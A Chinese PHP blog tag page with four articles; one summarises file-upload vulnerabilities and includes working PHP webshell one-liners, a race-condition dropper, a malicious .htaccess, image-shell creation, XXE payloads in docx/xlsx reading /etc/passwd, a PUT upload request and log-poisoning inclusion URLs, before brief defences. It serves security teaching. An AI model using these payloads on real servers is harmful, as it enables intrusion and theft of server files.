REC
首页
文章分类
源码资源
技术教程
程序软件
文创娱乐
玄学修炼
关于我们
其他页面
网站统计
友情链接
用户留言
高清壁纸
关于易航
热门文章
Joe再续前缘主题 - 搭建本站同款网站
易航网址导航系统 – 功能强大,轻量易用
JsonDb-PHP轻量级文件数据库系统
Typecho一键调整网站为冬天情景插件
V免签全开源免签约码支付系统(支持:支付宝 微信 QQ)
标签搜索
PHP
Web前端
网站源码
PHP源码
Typecho
Typecho插件
课程资料
Windows程序
Android软件
武术内功
HTML源码
Web
Joe主题
Python
Windows
国漫
网络协议
MySQL
NodeJs
小说
发布
登录
注册
找到
51
篇与
PHP
相关的结果
- 第 2 页
2025-01-11
解锁 PHP 异常处理:构建高可靠性应用
健壮的PHP应用注重完善的错误处理机制,它是可靠性、可性和用户友好性的基石。然而,维护错误处理却常常被忽视或未能得到一致的应用,导致代码库脆弱、难以实现调试和维护。尽管许多开发者意识到错误处理的重要性,但我却发现一些应该是常识性的做法,例如正确的处理异常,在实际项目中经常被误解、误用,甚至完全被忽略。这让我意识到即使到了,皮肤基本的错误处理技巧,也值得反复强调和重视。 这凸显了积极讨论和推广异常处理最佳实践的重要性。未能正确捕获错误、中断通用异常类型、或者在错误消息中遗漏了关键上下文信息,这些常见的错误都会降低应用程序的健壮性,并显着增加调试的难度。 本文将重点探讨PHP异常的重要性,以及如何利用它们编写更简洁、补充弹性的代码。通过理解异常的机制和正确的使用方法,我们可以弥补实践中的不足,构建既健壮又易于维护的应用程序。 为什么异常对于错误至关重要处理 传统的错误处理方式(如返回错误代码)常常导致代码冗长且容易出错。异常提供了一种更清晰、更格式化的错误处理方式,其优点在于: 分离错误处理逻辑与业务逻辑,使代码更简洁易懂。 支持集中式错误管理,提高代码的可维护性。 提供堆栈跟踪信息,简化调试过程。 采用包装的 try/catch 块,使错误处理流程更清晰。 使用异常能够确保在整个应用程序中实现一致且有效的错误处理。 1、抛出和捕获异常 而返回错误代码,不如使用 throw 语句发送异常。这会立即中断当前代码执行流程,确保错误被及时并发现处理。 function divide($a, $b) { if ($b === 0) { throw new InvalidArgumentException("Division by zero is not allowed."); } return $a / $b; } try { echo divide(10, 0); } catch (InvalidArgumentException $e) { echo "Error: " . $e->getMessage(); } 异常会中断当前执行流程,并沿着调用栈向上冒泡,直到被捕获。 使用具体的异常类(如InvalidArgumentException)可以更清晰地表达错误类型,方便后续处理。 2、创建自定义异常类 为了更准确地描述和处理错误,建议创建自定义异常类。这有助于为错误添加特定上下文信息,从而更容易理解和管理。 function divide($a, $b) { if ($b === 0) { throw new InvalidArgumentException("Division by zero is not allowed."); } return $a / $b; } try { echo divide(10, 0); } catch (InvalidArgumentException $e) { echo "Error: " . $e->getMessage(); }自定义异常可以提高代码的可执行性,并支持更细粒度的错误处理。 3、使用全局异常处理程序 为了捕获应用程序中所有未处理的异常,请设置一个全局异常处理程序。这样可以确保任何错误都不会被遗漏,并为意外错误提供兜底方案。 set_exception_handler(function ($exception) { error_log("Unhandled exception: " . $exception->getMessage()); echo "An unexpected error occurred. Please try again later."; }); throw new Exception("Test exception"); 集中式错误日志记录:主要是跟踪和分析错误。 优雅的用户体验型错误提示:提升用户体验。 防止程序崩溃:降低未处理异常导致应用程序崩溃的风险。 4、将错误转化为异常 PHP允许你使用自定义错误处理程序将传统错误(例如通知、警告)转换为异常。这有助于将所有错误处理统一到异常机制处理下。 set_error_handler(function ($severity, $message, $file, $line) { throw new ErrorException($message, 0, $severity, $file, $line); }); try { echo $undefinedVariable; // Will trigger an error } catch (ErrorException $e) { echo "Converted Error: " . $e->getMessage(); }将错误转换为异常后,你可以使用try-catch代码块对所有问题进行统一管理。 5、记录异常 为了方便排查故障和监控系统运行状况,一定记录所有异常。建议使用 Monolog 等日志库,或 Sentry 等外部监控服务。 try { throw new RuntimeException("Something went wrong."); } catch (RuntimeException $e) { error_log($e->getMessage()); echo "An error occurred. Please try again later."; }预定日志信息包含关键细节,例如错误消息、堆栈跟踪以及时钟。 6、应用程序逻辑的异常 异常不仅可以处理运行时错误,还可以用于增强业务逻辑的健壮性以及验证用户输入。 function processOrder($quantity) { if ($quantity <= 0) { throw new InvalidArgumentException("Quantity must be greater than zero."); } echo "Order processed for quantity: $quantity"; } try { processOrder(0); } catch (InvalidArgumentException $e) { echo "Validation Error: " . $e->getMessage(); }将异常用于逻辑验证有助于保证代码的健壮性和可预测性。 总结 异常是构建健壮且易于维护的PHP应用程序的强大工具。通过以下实践: 使用錯誤類型 设置全局异常处理程序 将错误转化为异常 记录错误 您可以构建一致且构造的错误处理策略。异常能够确保错误得到有效处理,使代码更简洁、更容易调试。 错误的目的,但完善的异常处理机制可以化解混乱,提升应用的稳定性和可靠性。
技术教程
# PHP
易航
1月11日
0
29
0
2025-01-11
15 个让你的 PHP 开发工作 更轻松的插件
在 PHP 开发过程中,借助各种插件可以显著提高开发效率、增强代码质量、改善工作流等。 以下是 15 个推荐的 PHP 插件,它们可以帮助你更轻松地进行开发,涵盖代码质量、调试、自动化、框架支持等多个方面。 PHPStan PHPStan 是一个静态分析工具,它帮助开发者发现潜在的错误和不一致的代码。PHPStan 支持各种 PHP 版本,并能发现潜在的类型错误、未使用的代码等问题。 功能: 静态类型检查。 提供详细的错误信息。 与 IDE 集成,实时反馈错误。 安装: composer require --dev phpstan/phpstan集成:与 IDE 如 PHPStorm、VSCode 配合使用,提供实时分析。 Xdebug Xdebug 是 PHP 中最常用的调试工具。它允许你进行步进调试、性能分析(profiling)和代码覆盖分析。Xdebug 通过提供堆栈跟踪和详细的错误信息,可以帮助你快速定位问题。 功能: 断点调试。 性能分析。 堆栈跟踪和错误日志。 安装: sudo apt-get install php-xdebug集成:可以与 IDE(如 PHPStorm、VSCode)配合使用,进行更高效的调试。 PHP_CodeSniffer PHP\_CodeSniffer 是一个用于检测 PHP 代码是否符合 PSR 编码标准的工具。它可以自动检查你的代码是否遵循 PSR-1、PSR-2、PSR-12 等编码标准,保持代码的一致性和可读性。 功能: 自动检测编码风格错误。 提供修复建议。 支持 PSR 标准和其他编码风格。 安装: composer require --dev squizlabs/php_codesniffer集成:与 IDE(如 PHPStorm)集成,自动提示代码风格问题。 Composer Composer 是 PHP 中最常用的依赖管理工具,几乎每个 PHP 项目都会使用它。它不仅用于管理第三方库,还能处理自动加载和版本控制。 功能: 管理项目的依赖。 支持自动加载。 提供版本控制和更新。 安装: curl -sS https://getcomposer.org/installer | php集成:集成到任何 PHP 项目中,自动管理依赖库。 Laravel Debugbar Laravel Debugbar 是一个用于 Laravel 框架的调试工具,它可以显示详细的请求信息、数据库查询、视图渲染、路由等调试信息。 功能: 显示请求的 HTTP 信息。 显示数据库查询、模型调试。 提供内存使用和执行时间统计。 安装: composer require barryvdh/laravel-debugbar --devTinker Tinker 是 Laravel 框架自带的交互式命令行工具。它让你可以在命令行中直接执行 PHP 代码,进行测试和调试,特别适合 Laravel 的开发者。 功能: 交互式命令行。 直接执行 Eloquent 查询和模型操作。 快速测试代码片段。 安装: composer require laravel/tinker --devPHPUnit PHPUnit 是 PHP 中最常用的单元测试框架。它帮助开发者编写和运行测试,确保代码的可靠性和稳定性。 功能: 单元测试、集成测试和功能测试。 提供详细的测试报告。 与 CI/CD 工具集成,自动化测试。 安装: composer require --dev phpunit/phpunitTwig Twig 是一个灵活的 PHP 模板引擎,它非常适用于动态内容生成。它的语法简洁,提供了丰富的扩展功能。 功能: 支持条件语句、循环、过滤器等。 提供缓存机制,提高性能。 与 Symfony、Laravel 等框架兼容。 安装: composer require twig/twigPHPMD (PHP Mess Detector) PHPMD 是一个静态分析工具,用于检查 PHP 代码中的潜在问题。它会检测代码中的“坏味道”,如重复代码、过长的函数、复杂度高的函数等。 功能: 检测潜在的代码问题。 支持规则自定义。 提供详细的报告。 安装: composer require --dev phpmd/phpmdPHP-CS-Fixer PHP-CS-Fixer 是一个自动修复代码风格问题的工具,支持 PSR 规范和其他流行的编码标准。它不仅能帮助你发现代码风格问题,还能自动修复这些问题。 功能: 自动修复代码风格问题。 支持 PSR 标准和其他风格。 配置灵活,支持规则自定义。 安装: composer require --dev friendsofphp/php-cs-fixerLaravel Eloquent Sluggable Eloquent Sluggable 是一个 Laravel 插件,帮助你为模型生成 SEO 友好的 URL 标识符(Slug)。它可以自动为你创建和管理 slug。 功能: 自动生成 slug。 支持自定义字段生成 slug。 与 Eloquent 模型无缝集成。 安装: composer require cviebrock/eloquent-sluggableSwoole Swoole 是一个高性能的异步网络通信框架,旨在提升 PHP 的并发处理能力。它支持协程、WebSocket、HTTP 等功能,可以大幅提高 PHP 应用的性能。 功能: 支持协程、异步、并发。 支持 WebSocket、TCP、HTTP 等协议。 提升 PHP 应用的性能。 安装: pecl install swooleLaravel Horizon Laravel Horizon 是一个用于监控 Laravel 队列的插件,它提供了一个漂亮的仪表板,可以帮助开发者管理队列的处理过程、失败的任务等。 功能: 实时监控队列。 提供队列处理的统计信息。 支持队列任务的重试和失败日志。 安装: composer require laravel/horizonCarbon Carbon 是一个用于日期和时间处理的 PHP 扩展,基于 PHP 的 DateTime 类。它为日期和时间提供了很多方便的操作和格式化方法。 功能: 支持日期加减、格式化、比较。 提供丰富的日期操作方法。 兼容时区处理。 安装: composer require nesbot/carbonGuzzle Guzzle 是一个强大的 PHP HTTP 客户端,用于发送 HTTP 请求并处理响应。它支持同步和异步请求,支持文件上传、JSON 支持等功能。 功能: 支持同步和异步请求。 支持文件上传和 JSON 处理。 提供详细的错误处理。 安装: composer require guzzlehttp/guzzle总结 以上 15 个 PHP 插件覆盖了开发中的各个方面,从编码标准、测试工具、调试工具,到模板引擎、HTTP 客户端等,它们能帮助开发者提高代码质量、开发效率、调试体验和性能等。 如果你能在 PHP 项目中有效地应用这些插件,将会大大简化开发流程,提高团队协作效率,并让项目更具可维护性。 图片
技术教程
# PHP
易航
1月11日
0
46
0
2025-01-10
PHP 文件上传漏洞总结
文件上传漏洞 文件上传漏洞是指后端服务器允许前端用户上传文件,但是对文件的名称、后缀、内容、大小等信息没有做过滤和控制,导致攻击者可以上传任意文件到服务器。 影响 1、上传恶意文件:比如上传后缀为.php、.jsp的文件,服务器收到后,对其没有进行校验。访问文件时,直接调用PHP解释器或JSP引擎执行,如果文件内容是可以执行系统命令的代码,攻击者就可以通过该文件获取服务器权限。 2、覆盖关键文件:服务器允许上传相同文件名的文件,如果可以通过目录遍历更改上传路径和位置,则可以覆盖关键文件。 3、DDoS攻击:如果服务器对上传文件的大小没有限制,则可以上传大量超大文件,占用服务器存储空间,消耗服务器带宽,造成DDoS攻击。 漏洞利用 当服务器存在文件上传漏洞时,需要根据具体情况采用合适的利用办法和绕过方式等,如下。 无限制上传WebShell 服务器不管是在前端还是后端,都没有对用户上传的文件做过滤和校验,导致攻击者可以在上传点直接上传webshell到服务器,从而获取服务器控制权。 绕过Centent-Type验证上传WebShell MIME:定义数据类型,告诉客户端或服务器,数据是什么类型,应该用什么方式处理。 Centent-Type:HTTP协议的一个字段,是MIME在HTTP协议中的应用。 Centent-Type验证属于后端的一个防护,服务器收到请求后,会验证Centent-Type类型是否被允许,如果不允许,则拒绝请求。如下图: 图片 假设服务器只允许Centent-Type类型为image/jpeg,上传test.php,Content-Type类型是application/octet-stream,服务器收到请求后,对Centent-Type进行对比检查,如果不符,拒绝访问。 在实战利用中,可以修改Centent-Type为服务器允许的类型进行绕过,方法有二。 一、前端上传.php文件,对上传请求进行拦截,在请求包中修改Centent-Type。 二、前端上传服务器允许的文件,如.jpg,对上传请求进行拦截,在请求包中修改文件文件后缀及内容。 通过目录遍历上传WebShell 为了让攻击者无法通过上传WebShell获取服务器权限,一般会将上传目录设置为只允许上传静态文件,且没有执行权,文件不允许被当作脚本执行,就算绕过层层防护,把WebShell上传到了服务器,也无法利用。 上传成功后,访问时,会把WebShell内容直接输出,或者是将WebShell下载,而不是调用解释器执行。 图片 遇到这种情况时,就是上传目录没有执行权,要绕过防护执行WebShell,可以通过中间件解析漏洞,或者通过目录遍历,将文件上传到可执行目录中,解析漏洞后面会详细讲,这里主要说一下目录遍历绕过。如下图: 图片 使用../将WebShell上传到上层目录,服务器如果对目录遍历有检测,禁止使用../进行目录遍历,也可以尝试目录遍历绕过,比如将/进行URL编码或其他什么方式。 绕过黑名单上传WebShell 情况一: 为了不让攻击者上传.php、.jsp等后缀的恶意文件,服务器直接将这些后缀列入了黑名单,但是百密一疏,黑名单这种情况总会漏掉一些其他可执行的文件后缀,如下: php > php3、php5、phtml jsp > jspx asp > asa、aspx如果服务器采用黑名单防护,可以尝试其他后缀代替。 情况二: 关于覆盖服务器配置的情况,服务器怎么去处理文件,以什么方式处理,都是根据配置文件中的配置去执行的,拿Apache服务器举例,Apache的配置文件是/etc/apache2/apache2.conf,如下配置: LoadModule php_module /usr/lib/apache2/modules/libphp.so AddType application/x-httpd-php .php这段配置是告诉服务器,加载php模块,将.php文件交给php解释器处理,那假如要配置上传目录没有执行权限,是不是也要跑到/etc/apache2/apache2.conf下配置呢,其实不用,该配置文件应用于全局,也就是整个服务器,为了一个目录的配置而修改整个服务器的配置是非常不方便的,这时候就用到了.htaccess文件,这是一个只针对于目录的配置文件,不影响全局配置,怎么使用呢,只要在需要单独配置的目录下,创建.htaccess文件即可,立即生效,不需要重启服务器。 如果服务器使用黑名单防护漏掉了.htaccess文件,则可以通过上传该文件修改目录配置或权限,假如上传目录upload没有执行权,那么可以上传以下内容的.htaccess。 LoadModule php_module /usr/lib/apache2/modules/libphp.so AddType application/x-httpd-php .php .jpg .txt简单理解就是后缀为.php、.jpg、.txt的文件,都交给php解释器执行,不管是图片马还是内容为木马的文本文件,都可以进行利用从而获取服务器权限。 混淆后缀上传WebShell 双写:上传WebShell到服务器后,服务器会把黑名单中的后缀替换为空,也就是去除,顺序是从左到右,且只进行一次操作,通过双写后缀进行绕过,如test.pphphp,经过替换后的文件名为test.php。 大小写:服务器验证文件后缀时,设置为区分大小写,那么就可以对文件后缀进行大小写处理,如.pHp、PhP等,因为只过滤.php,所以经过大小写处理的后缀可以被上传,又因为配置文件处理.php文件时不区分大小写,所以.pHp可以被执行。 多后缀:服务器处理上传文件时,对后缀进行检查,顺序是从后往前,具体来说就是检查从后往前的第一个点(.)第一个点(.)后面的内容就会被识别为后缀,那么webshell文件test.php则可以在后面添加允许的后缀绕过检查,test.php.jpg。也可以只加点(.),test.php.,这样的话后缀实际上就是空,空后缀没有在黑名单中,就可以绕过。 尾部字符:文件上传到服务器后,如果文件名中带空格,服务器会自动去除空格,如果上传时服务器对空格没有过滤,且加空格的后缀也没有在黑名单,就可以通过后缀加空格绕过了。上传到服务器后空格被去除,后缀被还原。 尾部符号绕过还有分号(;)和空字节的URL编码(%00),即代表结束、截断的意思,test.php;.jpg、test.php%00.jpg,上传时服务器检查后缀是.jpg,可以上传没问题,但是在执行时,分号(;)和空字节的URL编码(%00)后面的部分会被忽略,最后识别到的文件就是test.php。但只针对GET请求,如果是POST,则需要拦截请求包,在数据包中修改了,test.php0x00.jpg,0x00是空字节的十六进制编码,实际利用中需要将其替换,而不是直接输入0x00。 URL编码:如果服务器在处理上传文件时,没有解码操作,则可以将点(.)进行URL编码(%2e)绕过,test%2ephp,服务器执行该文件时会进行解码,这时文件名被还原test.php。 这只是混淆文件后缀众多方法中的一小部分。其中双写、大小写、末尾加点(.)加空格和URL编码属于是黑名单绕过范畴,而多后缀、00截断则针对的是白名单防护。 绕过文件内容检查上传WebShell 为了防止攻击者上传包含恶意代码的图片文件,服务器会对上传文件的内容做检查,检查是否具有图片的特征,如文件头的前两个字节是不是图片,内容中有没有图片的尺寸属性等等。 可以制作一个图片马进行绕过,方式如下: copy test.jpg/b+shell.php shell.jpgcopy:windows系统复制命令。 test.jpg:合法图片文件。 /b:二进制模式,表示复制过程中,合法图片的内容不被修改,原封不动地复制。 +:附加,这里表示把shell.php文件内容附加到test.jpg文件中去。 shell.php:webshell。 shell.jpg:最后生成的图片马文件。 制作方法有很多,这里用的是copy方法,这样制作的图片马可以以图片形式正常打开,只是把webshell文件内容隐藏到了图片内容的末尾。 如果只检查文件头,则可以只修改文件头为合法的即可,如下: JPG:0xFF 0xD8 PNG:0x89 0x50 GIF:0x47 0x49修改文件头有很多工具和插件都可以完成,也可以使用Burp拦截上传请求后,在数据包中修改,现在代码前添加两个占位符,选中后修改其十六进制为图片即可,如下图: 图片 条件竞争上传WebShell 现代框架处理上传文件,一般是先放到沙盒目录,比如/upload\_sandbox,用于临时存放文件和隔离上传文件,且没有执行权,文件上传到沙盒目录时还会进行随机改名处理,防止覆盖文件。接下来会检查文件的文件名、文件内容、后缀、魔数等等,如果符合要求判定为安全,才会将文件上传到真实上传目录,比如/upload,如果识别文件是危险的,则会直接删除。 但是,如果没有使用任何框架,而是自定义处理上传的文件,则会出现一种情况,就是上传文件时,没有经过任何过滤就直接存放到了服务器真实上传目录,然后才对其是否合法进行检查,合法保留,不合法删掉,检查时间可能就只有几毫秒,虽然时间很短,但仍然可以通过条件竞争方式上传WebShell。 操作只需要两步: 一、拦截上传请求,对其进行并发,文件后缀为php,内容如下: <?php fputs(fopen('shell.php','w'),'<?php @eval($_POST[123])?>'); ?>fopen('shell.php','w') :以写的模式打开shell.php,如果文件不存在就新建一个。 fputs :将 <?php @eval($_POST[123])?> 写入shell.php。 如下图: 图片 二、拦截访问请求,对其进行并发,访问的是我们上传的test.php,上传路径可以先上传一张合法图片查看,并发过程和第一步一样,也可以修改线程,提高成功率。 上传test.php到服务器后,服务器并没有及时删除(几毫秒时间),且幸运的被访问到,则执行命令,创建WebShell。 上传其他恶意文件 除了上传WebShell获取服务器权限外,还可以上传其他恶意文件进行攻击,如下情况: 一、服务器允许上传html、svg后缀的文件,则可以构造恶意JS脚本,进行XSS攻击。 二、服务器允许上传docx、xlsx后缀的文件,则可以引入XML外部实体,进行XXE攻击。 docx和xlsx文件都是一个ZIP压缩包,其中包含多个XML文件,可以向XML文件中注入XXEPayload,方法如下: docx 1、新建docx文件并解压。 2、解压后的文件结构如下图。 图片 word文件夹下有多个XML文件,均可以注入,但推荐修改document.xml。 图片 3、记事本打开文件document.xml进行修改。 4、document.xml原内容如下: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <w:document> <w:body> <w:p w14:paraId="367FED8D" w14:textId="1728AEF6" w:rsidR="007A2F41" w:rsidRDefault="00653F26"> <w:r> <w:rPr> <w:rFonts w:hint="eastAsia"/> </w:rPr> <w:t></w:t> </w:r> </w:p> <w:sectPr w:rsidR="007A2F41"> <w:pgSz w:w="11906" w:h="16838"/> <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/> <w:cols w:space="425"/> <w:docGrid w:type="lines" w:linePitch="312"/> </w:sectPr> </w:body> </w:document>修改后的内容如下: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <!DOCTYPE test [ <!ENTITY test SYSTEM 'file:///etc/passwd'>]> <w:document> <w:body> <w:p w14:paraId="367FED8D" w14:textId="1728AEF6" w:rsidR="007A2F41" w:rsidRDefault="00653F26"> <w:r> <w:rPr> <w:rFonts w:hint="eastAsia"/> </w:rPr> <w:t>&test;</w:t> </w:r> </w:p> <w:sectPr w:rsidR="007A2F41"> <w:pgSz w:w="11906" w:h="16838"/> <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/> <w:cols w:space="425"/> <w:docGrid w:type="lines" w:linePitch="312"/> </w:sectPr> </w:body> </w:document>共对两处进行了修改: a.定义外部实体test,内容为读取服务器/etc/passwd文件。 b.在<w:t>标签中引用test实体。 5、修改后,将文件夹重新压缩成ZIP文件,再改后缀为docx。 6、打开文件时会显示文件部分内容有问题,是否恢复,点否即可。 xlsx: 大致过程和具体细节和docx相似,但涉及的XML文件不同。 1、新建xlsx文件并解压。 2、解压后的文件结构如下图。 图片 3、记事本打开文件sheet1.xml进行修改,位置:xl > worksheets > sheet1.xml。 4、sheet1.xml原内容如下: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <worksheet> <dimension ref="A1"/> <sheetViews> <sheetView tabSelected="1" workbookViewId="0"/> </sheetViews> <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/> <sheetData> <row r="1" spans="1:1" x14ac:dyDescent="0.25"> <c r="A1" t="s"> <v>0</v> </c> </row> </sheetData> <phoneticPr fontId="1" type="noConversion"/> <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/> <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/> </worksheet>修改后的内容如下: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <!DOCTYPE test [ <!ENTITY test SYSTEM 'file:///etc/passwd'>]> <worksheet> <dimension ref="A1"/> <sheetViews> <sheetView tabSelected="1" workbookViewId="0"/> </sheetViews> <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/> <sheetData> <row r="1" spans="1:1" x14ac:dyDescent="0.25"> <c r="A1" t="s"> <v>&test;</v> </c> </row> </sheetData> <phoneticPr fontId="1" type="noConversion"/> <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/> <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/> </worksheet>还是定义了外部实体test并且引用,在<v>标签中。 5、修改后,将文件夹重新压缩成ZIP文件,再改后缀为xlsx。 6、打开文件时会显示文件部分内容有问题,是否恢复,点否即可。 如果服务器允许解析XML外部实体,上传后观察响应,是否返回内容,也不排除盲的情况,可以将定义的外部实体内容修改为自己的dnslog地址进行测试。 使用PUT上传文件 如果服务器允许PUT方法,即使没有上传点,也可以进行文件上传,如下请求: PUT /images/test.php HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-httpd-php Content-Length: 49<?php @eval($_POST[123]); ?>可以通过OPTIONS方法向服务器发送预检请求,判断是否允许PUT方法。 文件包含 文件包含漏洞主要出现在PHP开发的Web应用中,在开发的时候,有很多地方会用到相同的代码,每次都重复写一遍太麻烦,为了方便,会使用文件包含函数直接包含代码文件,如果文件包含函数对包含的文件没有进行过滤和校验,就会造成文件包含漏洞。 include():包含文件不存在或出错,程序继续运行。 require():包含文件不存在或出错,程序终止运行。 include_once():如果相同的文件已被包含,不再进行二次包含操作。 require_once():如果相同的文件已被包含,不再进行二次包含操作。文件包含又分为本地包含(LFI)和远程包含(RFI),包含路径用相对路径或绝对路径都可以,RFI需要PHP配置allow\_url\_include=on。 LFI:https://example.com/index.php?file=../../upload/shell.php RFI:https://example.com/index.php?file=https://test.com/upload/shell.php利用文件包含漏洞执行WebShell 在防御文件上传攻击时,服务器使用了白名单校验,但是,如果服务器存在文件包含漏洞的话,攻击者依然可以执行WebShell获取服务器权限。 制作图片马,或其他包含恶意代码的合法文件上传至服务器绕过白名单校验,通过对该文件进行包含,让服务器去执行,PHP在执行include()或require()时,不会验证后缀,只会读取内容,如果是PHP代码,则会使用PHP解释器执行。 通过写入日志执行WebShell 服务器使用了更强大的防护机制,不仅检查文件后缀,还对文件内容进行了严格校验,只要包含恶意代码,一律拒绝上传,这样的话就无法通过上传方式执行WebShell获取服务器权限了,但是,如果服务器存在文件包含漏洞,可以直接包含恶意代码,将代码写入日志文件,再包含日志文件执行WebShell。 https://example.com/index.php?file=<?php @eval($_POST[123]); ?>如果在浏览器包含执行,浏览器会把特殊符号进行URL编码,可以通过Burp发送。 图片 400的原因是包含的文件不存在,查看日志文件,木马成功写入。 图片 再包含日志文件就可以执行WebShell了,默认访问日志文件路径参考: nginx: /var/log/nginx/access.log apache: /var/log/apache2/access.log /var/log/httpd/access_log 解析漏洞 从客户端发送请求,到数据库收到请求,这中间经过的程序都叫中间件,而解析漏洞主要说的是Web服务应用程序,也就是IIS、Apache、Nginx等等,这里就先简单讲一下关于这三个中间件的解析漏洞。 IIS IIS分低版本(IIS 5.x-IIS 6.x)和高版本(IIS 7.x及以上),低版本只能解析asp的WebShell。方法如下: 目录解析: 服务器会把后缀为.asp文件夹下的文件,都按asp文件解析执行,如下: https://example.com/upload/test.asp/test.jpg如果上传路径可控,可以添加一个以.asp为后缀的文件夹,把图片马放到该目录下上传,访问执行WebShell。 文件解析: 之前将混淆后缀的时候讲到过,就是在后缀后面加个分号(;)在跟一个合法后缀,如下: https://example.com/upload/test.asp;.jpg解析的时候分号(;)代表结束,所以后面的内容不会解析,解析文件就成了test.asp。 格式解析: 有些后缀服务器也会当作asp解析,比如.asa、cer、cdx等等,具体可以查看ISAPI扩展。 https://example.com/upload/test.cerIIS7.x版本也存在解析漏洞,跟Nginx的解析漏洞一样, 这就不讲了,统一在Nginx解析漏洞中讲。 Apache 解析顺序: Apache服务器解释的时候顺序是从右往左,如果添加服务器无法识别的后缀会发生什么呢,如下: https://example.com/upload/test.php.aaa.bbb假如往服务器上传了一个test.php.aaa.bbb文件,正常情况下肯定是访问失败,但是Apache低版本(Apache2.2及以下)是可以正常解析的,访问执行时,服务器从右往左开始解析后缀,如果无法解析,就会继续向左解析,直到碰到可以解析的后缀,那么test.php.aaa.bbb文件最后就会被解析成test.php。 配置文件: 上面也提到过,就是AddType application/x-httpd-php配置,该配置的意思是什么后缀会被当成php代码解析,如果配置不当,将一些合法后缀添加到该配置项,就会被攻击者利用,造成安全问题,如下: AddType application/x-httpd-php .php .jpg .txtNginx 跟php和nginx的配置有关,先看一下正常情况,向服务器上传图片马绕过白名单校验。 https://example.com/upload/test.jpg在图片马后添加一个不存在的php文件,如下: https://example.com/upload/test.jpg/123.php正常肯定返回404页面不存在,但是如果nginx错误配置try\_files,收到请求后,不会去检查文件是否存在,而是看是什么类型的文件,如果是php,直接交给php解释器去执行,php配置cgi.fix\_pathinfo,默认值为1,表示开启,0是关闭,正常情况,php解释器会检查123.php是否存在,如果不存则响应404,但是使用cgi.fix\_pathinfo配置后,如果123.php不存在,则会检查上一层目录是否存在,以此类推,检查到test.jpg时,发现test.jpg存在,php解释器就会把test.jpg当作php解析执行。 所以测试的时候,在图片马后加一个不存在的php文件判断就行了。 绕过 文件上传漏洞绕过总结,如下图: 图片 预防攻击 可以借鉴以下方式对文件上传漏洞进行防御和修复。 白名单校验 对文件后缀进行白名单校验,只允许上传白名单中被允许后缀的文件,例如只允许上传.jpg、.png类型文件。同时对MIME类型进行检查。 检查文件内容 对上传文件的内容进行严格检查,如果存在恶意代码,拒绝上传,检查文件名,防止覆盖文件,或者对上传到服务器的文件进行修改随即名处理。 上传目录权限 设置上传目录为只允许上传静态文件,避免上传目录拥有执行权,防止攻击者绕过防护上传WebShell到服务器执行。 使用安全框架 尽量使用安全的框架处理文件上传,如果使用自定义,请做好安全防护。 安全的中间件 使用最新版本的中间件,及时更新,正确配置,避免攻击者利用中间件解析漏洞进行文件上传漏洞利用。 总结 如果你对安全感兴趣,别忘了关注我们,持续为你带来最新的安全动态与技术分享!
技术教程
# PHP
# 网络安全
易航
1月10日
0
39
0
2025-01-10
PHP 内置对象是什么
PHP 内置对象是什么? 这个问题看似简单,实则暗藏玄机。简单来说,它们是 PHP 语言自带的、无需你额外声明就能直接使用的对象。但 “直接使用” 背后,是 PHP 运行时环境为你默默构建的一整套机制,理解它,能让你写出更优雅、更高效的 PHP 代码。 首先,咱们得明确一点,这些对象并非凭空出现。它们是 PHP 处理各种请求、管理资源、执行操作的基石。例如,你访问一个数据库,背后是 PDO 对象在默默工作;你处理用户上传的文件,$_FILES 数组(虽然是数组,但其底层依赖对象机制)帮你收集信息;甚至你写的每一个函数,都在 Closure 对象的庇护下运行。 深入挖掘,你会发现 PHP 内置对象大致可以分为几类: 一、与请求相关的对象 $_GET、$_POST、$_REQUEST、$_SERVER、$_COOKIE、$_SESSION,这些家伙们是处理 HTTP 请求的得力干将,它们分别从不同的渠道收集信息,将用户的请求转化为 PHP 能理解的数据结构。 别小看它们,安全问题往往就藏在对这些对象的处理中。例如,直接使用 $_GET 或 $_POST 的值而不进行任何过滤,很容易造成 SQL 注入或 XSS 攻击。 记住,永远不要相信用户输入,这是程序员的金科玉律。 二、与文件操作相关的对象 SplFileInfo、SplFileObject 等,它们是文件系统操作的利器,用它们可以更方便地处理文件和目录。与直接使用 fopen、fread 等函数相比,面向对象的方式更易于维护和扩展。 一个典型的例子:你需要遍历一个目录下的所有文件,SplFileInfo 可以让你轻松实现,避免了繁琐的循环和错误处理。 三、与数据库操作相关的对象 PDO (PHP Data Objects) 是连接数据库的标准接口。虽然它并非像 $_GET 那样可以直接使用,但它提供了访问各种数据库的统一方式。 使用 PDO 的好处在于,它帮你屏蔽了不同数据库之间的差异,让你只需关注 SQL 语句本身,而不用担心数据库连接细节。 但 PDO 的使用也有一些坑,比如参数绑定一定要做好,否则很容易造成 SQL 注入。 四、与异常处理相关的对象 Exception 及其子类,是处理程序错误的基石。抛出异常,优雅地处理错误,是写出健壮程序的关键。 别总是用 die() 或 exit() 来结束程序,学会使用异常处理,能让你的程序更易于调试和维护。 一个小例子,感受一下 SplFileInfo 的魅力: <?php $directory = new \RecursiveDirectoryIterator('./my_directory'); $iterator = new \RecursiveIteratorIterator($directory); foreach ($iterator as $file) { if ($file->isDir()) { echo "Directory: " . $file->getPathname() . PHP_EOL; } elseif ($file->isFile()) { echo "File: " . $file->getPathname() . " (" . $file->getSize() . " bytes)" . PHP_EOL; } } ?>这段代码简洁地遍历了一个目录及其子目录下的所有文件和目录,并打印出文件名和大小。 如果没有 SplFileInfo 和 RecursiveIteratorIterator,你得写一大堆代码来实现同样的功能。 最后,我想说,深入理解 PHP 内置对象,不仅能让你写出更优雅的代码,还能提升你的编程水平。它们是 PHP 运行时的核心组成部分,理解它们的工作机制,才能真正驾驭这门语言。 别只是停留在表面,去探索它们的内部细节,你会发现更多惊喜。
技术教程
# PHP
易航
1月10日
0
